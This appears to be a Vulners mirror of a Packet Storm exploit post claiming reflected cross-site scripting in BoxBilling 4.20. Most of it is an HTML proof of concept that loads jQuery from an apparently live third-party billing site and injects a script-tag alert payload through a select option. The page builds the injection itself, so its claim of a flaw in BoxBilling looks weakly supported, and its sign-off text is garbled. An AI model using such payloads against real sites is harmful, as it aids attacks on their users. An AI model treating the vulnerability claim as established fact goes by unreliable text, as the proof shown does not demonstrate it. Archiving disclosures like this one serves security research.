Lucene search
K

BoxBilling 4.20 Cross Site Scripting

🗓️ 04 Oct 2016 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 37 Views

BoxBilling 4.20 Cross Site Scripting vulnerability in jquery 1.7.

Code
`========================================================================  
| # Title : BoxBilling 4.20 cross site scripting Exploits  
| # Author : indoushka  
| # email : [email protected]  
| # Tested on : windows 8.1 FranASSais V.(Pro)  
| # Version : 4.20  
| # Vendor : https://github.com/boxbilling/boxbilling/releases/download/4.20/BoxBilling.zip  
| # Dork : BoxBilling 4.20  
========================================================================  
  
poc :  
  
<html>  
<head>  
<meta charset="utf-8">  
<title>XSS Reflected - Jquery 1.7.2 </title>  
<script src="http://crystalhostsa.co.za//billing/bb-themes/boxbilling/assets/jquery.min.js"></script>  
<script>  
$(function() {  
$('#users').each(function() {  
var select = $(this);  
var option = select.children('option').first();  
select.after(option.text());  
select.hide();  
});  
});  
</script>  
</head>  
  
  
<body>  
<form method="post">  
<p>  
<select id="users" name="users">  
<option value="xssreflected"><script>alert(&#x27;xss  
reflected - jquery 1.7.1 by - indoushka thnx to   
@firebitsbr - [email protected]&#x27;);</script></option>  
</select>  
</p>  
</form>  
</body>  
</html>  
  
  
  
Greetz : aua'>>a'1/2a'1/2a'dega'deg aua'degaua'degau a'>>a'*a'*auaua'>>------au-auau-a'deg a'degaua'degauPSaua'3a'>>au-------- aua'degauau!a'>>auau aua'degauaua'*oauaua'degau ------  
|  
jericho * Larry W. Cashdollar * moncet-1 * achraf.tn |  
|  
===================== pa'degaua'1/2a'>>au auauoauau aua'>>auauauauauauC/ =============================  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Oct 2016 00:00Current
0.1Low risk
Vulners AI Score0.1
37